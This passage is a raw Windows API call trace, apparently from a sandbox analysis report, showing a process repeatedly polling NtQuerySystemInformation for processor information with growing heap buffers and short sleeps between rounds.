hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.346] Sleep (dwMilliseconds=0x110) [0256.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0256.356] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0256.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0256.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0256.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0256.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0256.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0256.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0256.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.363] Sleep (dwMilliseconds=0x110) [0256.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0256.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0256.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0256.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0256.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0256.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0256.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0256.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0256.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.381] Sleep (dwMilliseconds=0x110) [0256.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0256.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0256.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0256.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0256.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0256.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0256.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0256.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0256.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.394] Sleep (dwMilliseconds=0x110) [0256.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0256.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0256.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0256.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0256.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0256.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0256.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0256.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0256.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.410] Sleep (dwMilliseconds=0x110) [0256.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0256.422] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0256.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0256.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0256.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0256.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0256.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0256.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0256.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.425] Sleep (dwMilliseconds=0x110) [0256.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0256.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0256.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0256.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0256.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0256.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0256.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0256.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0256.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.442] Sleep (dwMilliseconds=0x110) [0256.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0256.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0256.477] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0256.477] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.479] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0256.479] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0256.479] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.480] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0256.480] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0256.480] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.481] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0256.481] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.483] Sleep (dwMilliseconds=0x110) [0256.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0256.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0256.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0256.521] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0256.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0256.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0256.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0256.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.523] Sleep (dwMilliseconds=0x110) [0256.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0256.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0256.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0256.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0256.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0256.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0256.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0256.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0256.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.597] Sleep (dwMilliseconds=0x110) [0256.729] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0256.729] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.730] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0256.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0256.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0256.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0256.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0256.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0256.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0256.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.736] Sleep (dwMilliseconds=0x110) [0256.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0256.838] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.839] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0256.839] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0256.839] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.839] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0256.839] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0256.839] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0256.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0256.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0256.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.845] Sleep (dwMilliseconds=0x110) [0256.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0256.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0256.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0256.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0256.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0256.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0256.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0256.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0256.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0256.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0256.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0256.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0256.863] Sleep (dwMilliseconds=0x110) [0257.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0257.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0257.009] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0257.009] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.010] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0257.010] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0257.010] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.011] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0257.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0257.011] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0257.011] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0257.012] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0257.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0257.014] Sleep (dwMilliseconds=0x110) [0257.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0257.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0257.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0257.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0257.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0257.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0257.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0257.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0257.568] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 